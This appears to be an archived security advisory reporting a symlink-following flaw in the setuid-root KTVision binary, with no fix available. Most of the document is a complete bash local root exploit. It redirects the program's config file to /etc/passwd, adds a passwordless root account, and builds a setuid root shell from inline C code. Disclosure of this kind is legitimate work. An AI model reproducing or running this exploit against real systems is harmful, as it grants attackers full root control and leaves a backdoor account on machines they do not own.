COMMAND

    KTVision

SYSTEMS AFFECTED

    ktvision prior to 0.1.1-271

PROBLEM

    Paul Starzetz found following.  There is a symlink follow problem
    in the (in many distributions suid root) ktvision binary.

    It is discouraging that nowadays such trivial symlink attacks  are
    still possible.   No comment anymore.  In order to  be complete: a
    bash script demonstrating this vulnerability is attached below.

    #!/bin/bash
    
    link=/home/paul/.kde/share/config
    linkto=/etc/passwd
    target=/opt/kde/bin/ktvision
    
    echo ""
    echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
    echo ""
    
    if ! test -u $target ; then
	    echo "[-] $target not found"
	    exit 1
    fi;
    
    echo "[+] $target found"
    
    rm -f sush*
    cat <<__DUPA__>>sush.c
    #include <stdio.h>
    main()
    {
	    setuid(geteuid());
	    setgid(getegid());
	    execl("/bin/bash", "/bin/bash", NULL);
    }
    __DUPA__
    
    echo "    compiling sush"
    res=$(gcc sush.c -o sush)
    
    if test "$res" != "" -o ! -x sush ; then
	    echo "[-] failed"
	    rm sush* ktvback.*
	    exit 2;
    fi;
    
    echo "[+] success"
    
    cp $linkto ktvback.$$
    mkdir -p $link
    rm -f $link/ktvisionrc
    ln -s $linkto $link/ktvisionrc
    
    echo ""
    echo -n "now running... (ensure that X is up and running)"
    
    $target >/dev/null 2>&1 &
    cpid=$!
    
    declare -i cnt
    declare -i max
    cnt=0
    max=60
    
    while ! test -O $linkto ; do
	    sleep 1;
	    printf "  %.2d" $cnt
	    cnt=$(($cnt+1))
	    if test $cnt -ge $max ; then
		    echo ""
		    echo ""
		    echo "[-] FAILED"
		    rm sush* ktvback.*
		    exit 2;
	    fi;
    done;
    
    kill -9 $cpid >/dev/null 2>&1
    rm $link/ktvisionrc
    
    echo ""
    echo ""
    echo "[+] SUCCESS, creating sush"
    echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
    echo ""
    su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
    ktvback.$$ $linkto; chown 0.0 $linkto"
    rm ktvback.* sush.c
    
    if ! test -u sush ; then
            echo "    hm strange error"
	    rm sush* ktvback.*
            exit 1
    fi;
    
    echo ""
    echo "starting ./sush"
    ./sush
    
    #!plonk

SOLUTION

    Nothing yet.